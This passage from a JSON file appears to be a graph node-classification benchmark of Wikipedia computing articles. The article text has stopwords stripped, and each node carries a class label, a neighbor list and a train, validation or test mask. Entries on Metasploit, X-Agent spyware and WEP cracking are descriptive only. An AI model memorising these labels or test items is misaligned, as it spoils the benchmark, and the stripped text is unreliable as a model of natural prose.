    "text": "Ethernut:ethernut ethernut open source hardware software project use embedded-ethernet-system currently four different reference designs exist ethernut 1 ethernut 2 ethernut 3 ethernut 5 available ready use boards reference designs share set interfaces designs mainly differ used microcontroller ethernut 1 2 8-bit avr ethernut 3 5 32-bit arm available memory size since ethernut 3 board mmc slot available ethernut 5 also includes usb host device interfaces rise idea internet things different groups people different aims started around 2000 developing embedded systems would able integrate existing tcp/ip networks limited resources mostly 8-bit embedded systems rarely reached exceeded 64 kb main memory imposed great challenge year 2000 british developer dave hudson released source code real-time operating system integrated tcp/ip stack named liquorice another challenge suitable hardware kind development nearly non-existing nearly network controllers time used pci-bus interface complex small microcontrollers one still-in-production controllers isa-bus interface also recommended new designs used together atmega103 microcontroller create single board computer layout board released bsd license one early open hardware projects one year hudson ceased work project source code liquorice used software foundation new ethernut project aimed integrate software hardware development first versions released avr freaks board project switched sourceforge 2002 open source operating system boards called nut/os modular real-time operating system licensed bsd license characteristics nut/os supported popular ssl/tls libraries wolfssl embedded security ethernut project implements network stack called nut/net implements substantial protocol socket api use nut/os programs supported protocols configuring nut/os nut/net quite simple download source packages nut/os configurator executed build needed libraries selected hardware configuration application programmers use nut/os nut/net libraries write software beside nut/os libraries application programmer use standard c libraries programming languages c used c++ mostly supported well additionally lua interpreter exists lua scripts executed interactively runtime board multitude simple sample applications exists easy introduction nut/os following architectures supported actively maintained research group distributed systems eth zurich developed distributed sensor network nodes based avr sensor nodes communicate via bluetooth system software open source btnut bluetooth stack used btnut stack based nut/os system extends nut/os functionality bluetooth access functions although btnut stack developed mainly btnode sensor nodes easily ported applications according german manufacturer egnite gmbh 33.000 ethernut boards sold state december 2013 several manufacturers compatible hardware achatz electronics netherlands proconx australia propox poland soc robotics canada hw group s.r.o czech republic thermotemp embedded-it germany beside nut/os operating system used base btnode sensor network eth zurich",
    "neighbors": [
      6273,
      7170,
      11413,
      9366,
      5402,
      5531,
      4777,
      682,
      10924,
      7983,
      8625,
      9780,
      5437,
      6207,
      7364,
      2887,
      5457,
      2517,
      4569,
      5472,
      9320,
      9964,
      5358,
      8432,
      5368,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8488,
    "label": 4,
    "text": "H._D._Moore:h. d. moore h moore network security expert open source programmer hacker developer metasploit framework penetration testing software suite founder metasploit project served chief research officer boston based security firm rapid7 provider security data analytics software cloud solutions remained chief architect metasploit framework departure rapid7 2016 since leaving rapid7 moore joined atredis partners vice president research development founded critical research corporation software firm develops rumble network discovery referred industry famous white hat hacker moore developed security software utilities united states department defense teenager founded metasploit project summer 2003 goal becoming public resource exploit code research development known work warvox axman metasploit decloaking engine rogue network link detection tools. started month browser bugs mobb initiative 2006 experiment fast-paced vulnerability discovery full disclosure started month bugs project meme resulted number web browser patches improved security measures moore discovered involved discovery number critical security vulnerabilities metasploit framework development platform creating security tools exploits framework used network security professionals perform penetration testing system administrators verify patch installations product vendors perform regression testing security researchers worldwide framework written ruby programming language includes components written c assembly language october 2009 metasploit project acquired rapid7 metasploit framework continues free rapid7 added commercial edition called metasploit express acquisition project hd moore became chief security officer rapid7 remaining chief architect metasploit warvox software suite exploring classifying auditing telephone systems unlike normal wardialing tools warvox processes raw audio call use modem directly model allows warvox find classify wide range interesting lines including modems faxes voice mail boxes pbxs loops dial tones ivrs forwarders using signal processing techniques axman activex fuzzing engine goal axman discover vulnerabilities com objects exposed internet explorer since axman web-based security changes browser also affect results fuzzing process metasploit decloaking engine system identifying real ip address web user regardless proxy settings using combination client-side technologies custom services vulnerabilities exploited tool properly configured tor setup result identifying information exposed rogue network link detection tools designed detect unauthorized outbound network links large corporate networks tools send spoofed tcp syn icmp echo requests original destination ip encoded packet read back external listening host moore work gained praise antagonism industry companies microsoft credited discovering vulnerabilities yet criticism metasploit similar tools due capacity used criminal purposes instead offensive security criticism fallen upon moore moore warned us law enforcement involvement critical.io scanning project according moore though 're always chasing bad guys – good guys never ahead 're ones wrote exploits often found wild defenders generally following black hats",
    "neighbors": [
      161,
      5636,
      1926,
      10026,
      3473,
      8050,
      1429,
      2262,
      6712,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8489,
    "label": 2,
    "text": "X-Agent:x-agent x-agent xagent spyware malware program designed collect transmit hacked files machines running windows linux ios android servers operated hackers employs phishing attacks program designed hop device device 2016 crowdstrike identified android variant malware first time claimed malware targeted members ukrainian military distributing infected version app control d-30 howitzer artillery ukrainian army denied crowdstrike report stated losses howitzer artillery pieces nothing stated cause slovakian computer security company eset obtained x-agent source code 2015 described inner workings report released october 2016 washington dc grand jury indictment resulting robert mueller investigation russian election interference charges agents russian gru moscow developed customized monitored x-agent malware used hack dccc democratic congressional campaign committee dnc democratic national committee networks beginning around april 2016 item 15 end page 4 beginning page 5",
    "neighbors": [
      1024,
      8320,
      131,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      10003,
      10132,
      4117,
      8726,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      11052,
      9518,
      7983,
      176,
      7601,
      1970,
      9395,
      9904,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      4054,
      7639,
      8664,
      857,
      1882,
      4314,
      7515,
      9435,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      9082,
      2815
    ],
    "mask": "Test"
  },
  {
    "node_id": 8490,
    "label": 2,
    "text": "The_Debian_System:debian system debian system 2005 non-fiction book written martin krafft deals exclusively debian gnu/linux detailing internal workings book mostly experienced users seeking in-depth technical knowledge rather beginners author native language german decided write debian de facto language english book written publication open source press later licensed co-publication starch press english version thus released two different isbns due popular demand book later translated german japanese french chinese translation works languages planned",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8491,
    "label": 2,
    "text": "Cabal_(software):cabal software haskell cabal common architecture building applications libraries aids packaging distribution software packages contained haskell platform cabal introduced simplify packaging haskell software modules added glasgow haskell compiler version 6.4 default package manager along ghc internal manager ghc-pkg actual binary cabal library cabal developed different packages throughout development gained additional features sandboxes allow escape so-called cabal hell see cabalizing process making library written haskell programming language conformant requirements cabal library infrastructure cabalizing may required library initially developed without taking requirements consideration developed prior introduction cabal haskell community cabal packages provide standard set metadata build process thus possible develop tools upload cabal packages cpan-like community repository software hackage even allow automated downloading compilation installation desired packages hackage since cabal uses global package repository default version conflicts dependencies lead cabal hell state certain packages get installed without re-installing already existing ones therefore breaking packages although version 1.18 introduced sandboxes improved dependency hell non-proper use sandboxes could still lead problems since packages hackage might build version boundaries dependencies loose result stable less bleeding edge variant hackage called stackage created fp complete",
    "neighbors": [
      4769,
      3876,
      6566,
      2281,
      5067,
      6797,
      7983,
      2804,
      1813,
      5397
    ],
    "mask": "Test"
  },
  {
    "node_id": 8492,
    "label": 3,
    "text": "KiKi_KaiKai:kiki kaikai set feudal japan player must assume role shinto shrine maiden named sayo-chan must use o-fuda scrolls ohari gohei wand defeat number renegade spirits monsters japanese mythology game noteworthy using traditional fantasy setting genre otherwise filled science fiction motifs game follows adventures sayo-chan young shinto shrine maiden living feudal japan one night sayo-chan fanning ceremonial fire visited seven lucky gods warn great impending danger suddenly band mischievous youkai appear kidnap gods quickly retreating faraway mountain range sayo-chan determined help gods sets journey across countryside confronts number strange creatures japanese mythology including obake yurei defeating several powerful youkai leaders sayo must battle leader ancient serpent orochi kiki kaikai overhead multi-directional shooter game requires player move four directions various levels attacking harmful enemies approach screen sayo-chan player attack either throwing special o-fuda scrolls eight separate directions swinging purification rod directly front techniques upgraded finding special paper slips left defeated enemies either enhance power improve range sayo damaged coming contact enemy hit knocked must resume level preset continuation point end level player must face powerful boss monster takes several attacks defeat difficult normal enemies several hidden items found attacking objects sayo purification rod used either enhance attack grant player points certain number points gained player gain another life additional chance complete level player lives exhausted number match screen appears random 3-digit number 50-base increments 100 150 200 250 last three digits player total score match number displayed granted free game game ends family computer disk system version kiki kaikai introduced gameplay changes original arcade version including new levels enemies well limiting number times player may use sayo-chan ranged o-fuda attack along second playable character miki-chan another shrine maiden designated player two character though several additional ports would made years one would rely basic game mechanics kiki kaikai originally created 1986 taito game designer hisaya yabusaki pulling inspiration tales japanese mythology well several top-down arcade shooters popular era game put conventional spin usually technologically driven science-fiction shoot 'em titles time utilizing action game elements player free move screen choose instead forced forward normal scrolling shooter fashion similar earlier released game commando style presentation kiki kaikai described taito lovely action game offering exotic asian atmosphere shortly game japanese debut bootleg version called knight boy released arcades various countries version though officially licensed taito exact duplicate original kiki kaikai altered title screen contained new gameplay elements features kiki kaikai ported numerous home consoles personal computer systems since original arcade release game first home version released msx2 february 10 1987 minor gameplay adjustments august 28 1987 version disk system released entitled kiki kaikai dotouhen added two-player support new playable character miki-chan pc engine version released three years later march 27 1990 largely based previous disk system instalment game made jump consoles june 12 2003 taito developed java-based version kiki kaikai mobile phones called kiki kaikai bizarre world port programmed mediakite appeared may 14 2004 windows-based pcs web-based game service launched taito japanese website later year courtesy ezweb kiki kaikai also made available along various classic taito titles number compilations would appear japanese-only taito memories vol 1 playstation 2 july 28 2005 taito pocket memories playstation portable 2006 game would officially released english first time part taito legends 2 playstation 2 pc xbox released north america may 2007 later taito legends power-up playstation portable kiki kaikai soundtrack composed hisayoshi ogura reflective traditional japanese folk music mostly utilizing woodwind string instruments like shamisen electronic beat music originally presented mono format composed entirely synth-based chiptunes standard audio development system older video game hardware exclusive game soundtrack never released commercially music game featured 1987 album taito game music catalog number 28xa-110 published alfa music single track medley song later presented individualized tracks 2002 re-release taito game music scdc-00156 time published sci-tron digital content kiki kaikai garnered harsh reviews long initial release gamespot considers games one taito sleepier titles overall less quality classic games like bubble bobble double dragon latter licensed technos u.s. game graphics though unique time produced preserve well allgame remarking get initial amusement game smiling ghosts comical skeletons 'll find graphics dull controls seen simplistic yet responsive though game levels found monotonous like ninja warriors kiki kaikai one-off work 1992 taito allowed natsume release kiki kaikai nazo kuro mantle would known pocky rocky north american release natsume would follow pocky rocky 2 years later would help altron release pocky rocky becky modern continuation kiki kaikai kiki kaikai 2 originally development playstation 2 console starfish entertainment set 2006 release canceled early development reemerge unlicensed spiritual successor title kiki kai world later became heavenly guardian published protagonist game design well ghost enemies would later become heavy influences characters reimu hakurei equivalent ghost enemies respectively touhou project games pc-98 sayo-chan kiki kaikai appeared one microgames",
    "neighbors": [
      8709,
      4043,
      10316,
      6797,
      4690,
      11477,
      6390,
      9501,
      5275,
      1693,
      4894
    ],
    "mask": "Test"
  },
  {
    "node_id": 8493,
    "label": 4,
    "text": "AV-TEST:av-test av-test independent organization evaluates rates antivirus security suite software microsoft windows android operating systems according variety criteria every month researchers publish results testing list products awarded certification organisation based magdeburg germany 2013 security specialist ceo security company kaspersky lab eugene kaspersky criticized av-test changing certification process",
    "neighbors": [
      7809,
      4994,
      1417,
      7948,
      6797,
      9488,
      2213,
      550,
      6823,
      2859,
      6699,
      4659,
      7739,
      9537,
      4435,
      10708,
      1242,
      7515,
      2654,
      6382,
      4464,
      9713
    ],
    "mask": "Test"
  },
  {
    "node_id": 8494,
    "label": 9,
    "text": "Commodore_BASIC:commodore basic commodore basic also known pet basic dialect basic programming language used commodore international 8-bit home computer line stretching pet 1977 c128 1985 core based 6502 microsoft basic shares many characteristics 6502 basics time applesoft basic commodore licensed basic microsoft pay royalties basis jack tramiel turned bill gates offer 3 per unit fee stating 'm already married would pay 25,000 perpetual license commodore took source code flat-fee basic developed internally 8-bit home computers commodore 128 v7.0 microsoft copyright notice displayed however microsoft built easter egg version 2 upgrade commodore basic proved provenance typing obscure command codice_1 would result codice_2 appearing screen easter egg well-obfuscated—the message show disassembly interpreter popular commodore 64 came basic v2.0 rom despite computer released pet/cbm series version 4.0 64 intended home computer pet/cbm series targeted business educational use built-in programming language presumed heavily used saved manufacturing costs v2 fit smaller roms convenient feature commodore rom-resident basic interpreter kernal full-screen editor although commodore keyboards featured two cursor keys alternated direction shift key held screen editor allowed users enter direct commands input edit program lines anywhere screen line prefixed line number tokenized stored program memory lines beginning number executed pressing key whenever cursor happened line marked significant upgrade program entry interfaces compared common home computer basics time typically used line editors invoked separate codice_3 command copy cursor truncated line cursor position also capability saving named files device including cassette – popular storage device days pet one remained use throughout lifespan 8-bit commodores inexpensive form mass storage systems supported filenames diskette made saving multiple files devices difficult user one systems note recorder counter display location file inaccurate prone error pet basic 2.0 files cassettes could requested name device would search filename reading data sequentially ignoring non-matching filenames file system also supported powerful record structure could loaded saved files commodore cassette data recorded digitally rather less expensive less reliable analog methods used manufacturers therefore specialized datasette required rather standard tape recorder adapters available used analog digital converter allow use standard recorder cost little less datasette command may used optional parameter load program memory address contained first two bytes file bytes discarded retained memory parameter used program load start basic program area widely differs machines commodore basic variants supplied codice_4 codice_5 commands worked like counterparts applesoft basic loading saving bitmaps specified memory locations pet support relocatable programs command always load first two bytes contained program file created problem trying load basic programs saved commodore machines would load higher address pet basic expected program workarounds move programs proper location program saved cbm-ii machine way load pet modifying first two bytes disk sector editor cbm-ii series basic program area 0 would result pet attempting load zero page locking like original microsoft basic interpreter based commodore basic slower native machine code test results shown copying 16 kilobytes rom ram takes less second machine code compared minute basic execute faster interpreter programmers started using various techniques speed execution one store often-used floating point values variables rather using literal values interpreting variable name faster interpreting literal number since floating point default type commands faster use floating point numbers arguments rather integers speed important programmers converted sections basic programs 6502 6510 assembly language loaded separately file poked memory data statements end basic program executed basic using codice_6 command either direct mode program execution speed machine language great game waiting user input programmers could poll reading selected memory locations c6 64 d0 128 denoting size keyboard queue delay halt execution commodore basic keywords could abbreviated entering first unshifted keypress shifted keypress next letter set high bit causing interpreter stop reading parse statement according lookup table meant statement high bit set accepted substitute typing entire command however since basic keywords stored memory single byte tokens convenience statement entry rather optimization default uppercase-only character set shifted characters appear graphics symbol e.g command codice_7 could abbreviated codice_8 resembled codice_9 onscreen commands two letters long cases longer cases like ambiguity unshifted letters command needed codice_10 codice_11 required codice_12 commands abbreviated form either due brevity ambiguity commands example command codice_13 abbreviation spelling collided separate codice_14 keyword located nearer beginning keyword lookup table heavily used codice_15 command single codice_16 shortcut common microsoft basic dialects abbreviating commands shifted letters unique commodore basic abbreviating keywords possible fit code single line line lengths usually limited 2 4 screen lines depending specific machine allowed slight saving overhead store otherwise necessary extra program lines nothing basic commands tokenized took 1 byte two case several commands basic 7 basic 10 memory matter way entered long lines could difficult edit codice_17 command displayed entire command keyword extending program line beyond 2 4 screen lines could entered program memory unique feature commodore basic use control codes perform tasks clearing screen positioning cursor within program invoked either issuing command x corresponds control code issued example control code clear screen pressing key question quote marks thus pressing following quote mark cause basic display visual representation control code case reversed heart acted upon program execution directly printing control codes uses less memory executes faster invoking function comparison implementations basic typically dedicated commands clear screen move cursor basic 3.5 proper commands clearing screen moving cursor program lines commodore basic require spaces anywhere command always display one line number statement e.g. common write programs spacing feature added conserve memory since tokenizer never removes space inserted keywords presence spaces results extra codice_18 bytes tokenized program merely skipped execution spaces line number program statement removed tokenizer program lines 80 characters total machines machines 40 column text would cause line wrap around next line screen vic-20 22 column display program lines could occupy many four basic 7.0 commodore 128 increased limit program line 160 characters four 40-column lines two 80-column lines using abbreviations instead possible fit even line basic 7.0 displays error user enters program line 160 characters length earlier versions produced error simply display ready prompt two lines line length exceeded line number counted number characters program line five digit line number result four fewer characters allowed one digit number order execution commodore basic lines determined line numbering instead followed order lines linked memory program lines stored memory singly linked list line number pointer containing address beginning next program line tokenized code line program entered basic would constantly reorder program lines memory line numbers pointers ascending order however program entered manually altering line numbers pointers poke commands could allow out-of-order execution even give line line number early days basic used commercially software protection technique discourage casual modification program line numbers range 0 65520 take five bytes store regardless many digits line number although execution faster fewer digits putting multiple statements line use less memory execute faster variable names significant 2 characters thus variable names codice_19 codice_20 codice_21 refer variable commodore basic also supports bitwise operators although feature part core microsoft 6502 basic code usually omitted implementations applesoft basic native number format commodore basic like parent ms basic floating point contemporary basic implementations used one byte characteristic exponent three bytes mantissa accuracy floating point number using three-byte mantissa 6.5 decimal digits round-off error common 6502 implementations microsoft basic utilized 40-bit floating point arithmetic meaning variables took five bytes store four byte mantissa one byte exponent unlike 32-bit floating point found basic-80 8080/z80 implementations microsoft basic supported integer double precision variables 6502 implementations floating point although commodore basic supports signed integer variables denoted percent sign range -32768 32767 practice used array variables serve function conserving memory limiting array elements two bytes array 2000 elements occupy 10,000 bytes declared floating point array 4000 declared integer array denoting variable integer simply causes basic convert back floating point slowing program execution wasting memory percent sign takes one additional byte store since also applies integer arrays programmer avoid using unless large arrays used would exceed available memory stored floating point also possible memory locations 32767 address defined signed integer period used place number 0 thus instead instead execute slightly faster statement used start machine language programs added commodore original microsoft basic code featured usr function invoking machine language routines automatically loads cpu registers values c64 varies machines -- used pass data machine language routines means calling kernal functions basic example clears screen since commodore 8-bit machines c128 automatically boot disk software usual technique include basic stub like begin program execution possible automatically start software loading require user type statement done piece code hooks basic ready vector versions microsoft basic array declared statement automatically set ten elements practice 11 since array elements counted 0 larger arrays must declared basic display error program run array re-dimensioned program unless variables wiped via clr statement numeric arrays automatically filled zeros created may momentary delay program execution large array dimensioned string variables represented tagging variable name dollar sign thus variables codice_22 codice_23 codice_24 would understood distinct array variables also considered distinct simple variables thus refer variable size string array merely refers many strings stored array size element allocated dynamically unlike implementations microsoft basic commodore basic require string space reserved start program unlike 8-bit machines apple ii commodore machines built-in clock initialized 0 power updated every tick pia/via/ted/cia timer thus 60 times per second assigned two system variables basic contain current time ti read-only modified result syntax error message may used set time via six number string error results using string six numbers clock reliable method timekeeping since stops whenever interrupts turned done kernal routines accessing iec ieee port pet port slow clock update ticks function commodore basic use clock generate random numbers accomplished however relatively limited use numbers 0 255 returned otherwise works implementations microsoft basic pseudo-random sequence used via fixed 5-byte seed value stored power memory locations c64 location differs machines number higher 0 generate random number amalgamated value included function seed value updated 1 time rnd function executed negative number goes point sequence current seed value specified number since true random number generation impossible statement typical c64 c128 utilize sid chip white noise channel random numbers basic 2.0 notoriously suffered extremely slow garbage collection strings garbage collection automatically invoked time function executed many string variables arrays manipulated course program clearing take hour worst conditions also possible abort garbage collection basic scan run/stop key performing routine basic 4.0 introduced improved garbage collection system back pointers later implementations commodore basic also function basic 2.0 suffered another technical flaw handle signed numbers 32768 thus function invoked c64 38k basic memory negative amount free basic memory displayed adding 65535 reported number obtain correct amount free memory pet vic-20 never 32k total memory available basic limitation become apparent c64 developed function basic 3.5 7.0 corrected problem basic 7.0 also split two functions one display free basic program text memory display free variable memory many basic extensions released commodore 64 due relatively limited capabilities native basic 2.0 one popular extensions dos wedge included commodore 1541 test/demo disk 1 kb extension basic added number disk-related commands including ability read disk directory without destroying program memory features subsequently incorporated various third-party extensions popular epyx fastload cartridge basic extensions added additional keywords make easier code sprites sound high-resolution graphics like simons basic although basic 2.0 lack sound graphics features frustrating many users critics argued ultimately beneficial since forced user learn machine language limitations basic 2.0 c64 led use built-in rom machine language basic load file designated memory location filename drive device number would read call location would specified x registers load routine would called disk magazine c64 loadstar venue hobbyist programmers shared collections proto-commands basic called command modern programming point view earlier versions commodore basic presented host bad programming traps programmer issues derived microsoft basic virtually every home computer basic era suffered similar deficiencies every line microsoft basic program assigned line number programmer common practice increment numbers value 5 10 100 make inserting lines program editing debugging easier bad planning meant inserting large sections program often required restructuring entire code common technique start program low line number jump table body program structured sections starting designated line number like 1000 2000 large section needed added could assigned next available major line number inserted jump table later basic versions commodore platforms included command well auto line numbering command would automatically select insert line numbers according selected increment addition variables treated global variables clearly defined loops hard create often causing programmer rely command later rectified basic 3.5 addition commands flag variables often needed created perform certain tasks earlier basics commodore also lack debugging commands meaning bugs unused variables hard trap structures standard part z80 microsoft basics added basic 3.5 unavailable earlier versions commodore basic common home computers commodore machines booted directly basic interpreter basic file programming commands could entered direct mode load execute software program execution halted using run/stop key variable values would preserved ram could printed debugging 128 even dedicated second 64k bank variable storage allowing values persist codice_25 codice_26 command issued along advanced screen editor included commodore basic gave programming environment repl-like feel programmers could insert edit program lines screen location interactively building program contrast business-oriented operating systems time like cp/m ms-dos typically booted command line interface programming language required platforms loaded separately versions commodore basic included disk-specific codice_27 codice_28 commands version built commodore 64 lacked requiring user specify disk drive device number typically 8 9 standard codice_29 command otherwise defaulted tape another omission commodore 64s basic 2.0 codice_30 command display disk contents without clearing main memory 64 viewing files disk implemented loading program listed showed directory pseudo basic program file block size line number effect overwriting currently loaded program addons like dos wedge overcame rendering directory listing direct screen memory list cbm basic versions chronological order successively added features",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      4764,
      797,
      3233,
      11683,
      5925,
      8101,
      10533,
      4136,
      10666,
      5293,
      303,
      7343,
      11315,
      4409,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8262,
      10750,
      712,
      9549,
      9166,
      847,
      2383,
      1879,
      9563,
      92,
      11229,
      2915,
      9188,
      5733,
      2665,
      11243,
      2541,
      8429,
      7281,
      9714,
      5747,
      7284,
      3062,
      759,
      7032,
      6778,
      7421,
      6910,
      1535
    ],
    "mask": "Train"
  },
  {
    "node_id": 8495,
    "label": 7,
    "text": "Heroku:heroku heroku cloud platform service paas supporting several programming languages one first cloud platforms heroku development since june 2007 supported ruby programming language supports java node.js scala clojure python php go reason heroku said polyglot platform features developer build run scale applications similar manner across languages heroku acquired salesforce.com 2010 212 million heroku initially developed james lindenbaum adam wiggins orion henry supporting projects compatible ruby programming platform known rack prototype development took around six months later heroku faced drawbacks lack proper market customers many app developers used tools environment jan 2009 new platform launched built almost scratch three-month effort october 2009 byron sebastian joined heroku ceo december 8 2010 salesforce.com acquired heroku wholly owned subsidiary salesforce.com july 12 2011 yukihiro matz matsumoto chief designer ruby programming language joined company chief architect ruby month heroku added support node.js clojure september 15 2011 heroku facebook introduced heroku facebook present heroku supports redis databases addition standard postgresql name heroku portmanteau heroic haiku japanese theme nod matz creating ruby name pronounced similarly “ widening ” japanese though creators heroku want name project particular meaning japanese language chose invent name applications run heroku typically unique domain typically applicationname.herokuapp.com used route http requests correct dyno application containers dynos spread across dyno grid consists several servers heroku git server handles application repository pushes permitted users heroku services hosted amazon ec2 cloud-computing platform",
    "neighbors": [
      1539,
      526,
      4623,
      10265,
      9245,
      5662,
      1568,
      5666,
      9766,
      39,
      5159,
      5677,
      3121,
      5681,
      564,
      10820,
      8262,
      4683,
      8779,
      8269,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      11376,
      3705,
      2170,
      4236,
      10893,
      6307,
      2217,
      11439,
      9906,
      7347,
      7352,
      4289,
      3269,
      1224,
      6367,
      2795,
      3819,
      253,
      8446,
      8451,
      272,
      1816,
      2328,
      2842,
      4377,
      8986,
      11038,
      6444,
      11070,
      8515,
      8520,
      4429,
      6993,
      1362,
      7512,
      8539,
      4958,
      3428,
      8554,
      10090,
      8044,
      7022,
      368,
      5499,
      11646,
      6018,
      7043,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      1435,
      5031,
      10681,
      448,
      2496,
      11201,
      8644,
      9682,
      467,
      10200,
      6618,
      6632,
      1001,
      490,
      1004,
      7660,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 8496,
    "label": 3,
    "text": "Gun.Smoke:gun.smoke gun.smoke 1985 vertical scrolling shooter arcade game capcom wild west-themed game designed yoshiki okamoto gun.smoke centers character named billy bob nes version bounty hunter vicious criminals wild west red dead revolver first installment red dead series spiritual successor gun.smoke gun.smoke similar 1942 commando also developed capcom differences game scrolling shooter screen scrolls upward automatically players three ways shoot using three buttons left right center shooting player also change way gunman shoots button combinations player dies getting shot struck enemies getting caught obstacle bottom screen player collect special items including horse protection three hits get killed obstacle boots speed movement bullets faster shots rifles longer shot range items found shooting barrels rifles boots bullets stock five items add score points include stars bottles bags dragonflies cows two items watch yashichi 1up cattle skull reduces billy power note two versions gun.smoke released license america romstar one fixed sequence bosses third sixth levels swapped roy followed wolf chief pig joe followed ninja version also removes boss rundown gun.smoke ported many systems game later ported nintendo entertainment system family computer disk system 1988 objective free town hicksville band criminals known wingates order capture dangerous henchmen stage player must retrieve wanted sign said henchman otherwise impossible clear stage nes version also different music game main character bounty hunter named billy bob even though nes version stayed true gameplay arcade version major changes done although virtually identical nes version fds version featured several differences soundtrack arcade version composed ayako mori august 25 1986 alfa records released limited edition soundtrack featuring music arcade version well two unused tracks catalog number capcom game music – 28xa-94",
    "neighbors": [
      11238,
      8937,
      10316,
      9006,
      1776,
      4082
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8497,
    "label": 4,
    "text": "SpoonWEP/WPA:spoonwep/wpa spoonwep/wpa gui uses aircrack-ng autonomously crack wep wpa keys tool included so-called network-scrounging cards chinese usb wi-fi adapters promise internet access free",
    "neighbors": [
      4580,
      7983,
      1232,
      2739,
      1429,
      823,
      10329,
      8922,
      10332
    ],
    "mask": "Test"
  },
  {
    "node_id": 8498,
    "label": 3,
    "text": "Interoperation:interoperation engineering interoperation setup ad hoc components methods make two systems work together combined system partial functionality certain time possibly requiring human supervision perform necessary adjustments corrections contrasts interoperability theoretically permits number systems compliant given standard work together long time smoothly unattended combined system full functionality standard another definition interoperation services effectively combining multiple resources domains ... requires interoperability interoperation usually performed systems combined designed standardization example legacy systems standard compliance expensive difficult immature interoperation may use following mechanisms components methods area data processing interoperation may also use following components methods",
    "neighbors": [
      531,
      2948
    ],
    "mask": "Test"
  },
  {
    "node_id": 8499,
    "label": 2,
    "text": "Pipeline_(Unix):pipeline unix unix-like computer operating systems pipeline mechanism inter-process communication using message passing pipeline set processes chained together standard streams output text process stdout passed directly input stdin next one first process completed second started executed concurrently concept pipelines championed douglas mcilroy unix ancestral home bell labs development unix shaping toolbox philosophy named analogy physical pipeline key feature pipelines hiding internals ritchie thompson 1974 turn allows clarity simplicity system article anonymous pipes data written one process buffered operating system read next process uni-directional channel disappears processes completed differs named pipes messages passed pipe named making file remains processes completed standard shell syntax anonymous pipes list multiple commands separated vertical bars pipes common unix verbiage example list files current directory retain lines output containing string view result scrolling page user types following command line terminal codice_1 produces process output stdout piped input stdin process grep key likewise process less process takes input previous process produces output next process via standard streams codice_2 tells shell connect standard output command left standard input command right inter-process communication mechanism called anonymous pipe implemented operating system pipes unidirectional data flows pipeline left right widely used unix shells special syntax construct creation pipelines usage one writes commands sequence separated ascii vertical bar character codice_2 reason often called pipe character shell starts processes arranges necessary connections standard streams including amount buffer storage default standard error streams stderr processes pipeline passed pipe instead merged directed console however many shells additional syntax changing behavior csh shell instance using codice_4 instead codice_2 signifies standard error stream also merged standard output fed next process bourne shell also merge standard error codice_4 since bash 4.0 using codice_7 well redirect different file commonly used simple pipelines shell connects series sub-processes via pipes executes external commands within sub-process thus shell direct processing data flowing pipeline however possible shell perform processing directly using so-called mill pipemill since codice_8 command used mill results initial command construct generally looks something like pipemill may perform intended body loop includes commands codice_9 codice_10 read codice_11 loop first iteration program let call drain read remaining output codice_12 loop terminate results depending specifics drain couple possible ways avoid behavior first drains support option disable reading codice_11 e.g codice_14 alternatively drain need read input codice_11 something useful given codice_16 input pipelines created program control unix codice_17 system call asks operating system construct new anonymous pipe object results two new opened file descriptors process read-only end pipe write-only end pipe ends appear normal anonymous file descriptors except ability seek avoid deadlock exploit parallelism unix process one new pipes generally call codice_18 create new processes process close end pipe using producing consuming data alternatively process might create new thread use pipe communicate named pipes may also created using codice_19 codice_20 presented input output file programs invoked allow multi-path pipes created especially effective combined standard error redirection codice_21 unix-like systems processes pipeline started time streams appropriately connected managed scheduler together processes running machine important aspect setting unix pipes apart pipe implementations concept buffering example sending program may produce 5000 bytes per second receiving program may able accept 100 bytes per second data lost instead output sending program held buffer receiving program ready read data next program pipeline reads buffer linux size buffer 65,536 bytes 64kib open source third-party filter called bfr available provide larger buffers required tools like netcat socat connect pipes tcp/ip sockets pipeline concept invented douglas mcilroy first described man pages version 3 unix mcilroy noticed much time command shells passed output file one program input another ideas implemented 1973 one feverish night wrote mcilroy ken thompson added codice_17 system call pipes shell several utilities version 3 unix next day mcilroy continued saw unforgettable orgy one-liners everybody joined excitement plumbing mcilroy also credits thompson codice_2 notation greatly simplified description pipe syntax version 4 idea eventually ported operating systems dos os/2 microsoft windows beos often notation although developed independently unix pipes related preceded 'communication files developed ken lochner 1960s dartmouth time sharing system tony hoare communicating sequential processes csp mcilroy pipes developed robot icon apple automator also uses pipeline concept chain repetitive commands together holds pipe homage original unix concept feature unix borrowed operating systems taos ms-dos eventually became pipes filters design pattern software engineering",
    "neighbors": [
      5249,
      515,
      9735,
      4492,
      6797,
      4750,
      8846,
      3856,
      4369,
      8975,
      9874,
      3733,
      5397,
      1561,
      6813,
      7325,
      671,
      5537,
      9507,
      5029,
      6694,
      2599,
      7975,
      10407,
      5036,
      2222,
      7983,
      8369,
      1586,
      11442,
      8631,
      2621,
      5698,
      4423,
      8522,
      8523,
      2380,
      9166,
      1359,
      5714,
      9298,
      11606,
      6487,
      8414,
      6369,
      6498,
      6120,
      2283,
      4589,
      11245,
      5363,
      5492,
      7544,
      4859,
      1277
    ],
    "mask": "Train"
  },
  {
    "node_id": 8500,
    "label": 4,
    "text": "Null_session:null session null session anonymous connection inter-process communication network service windows-based computers service designed allow named pipe connections may used attackers remotely gather information system",
    "neighbors": [
      6797
    ],
    "mask": "None"
  },
  {
    "node_id": 8501,
    "label": 3,
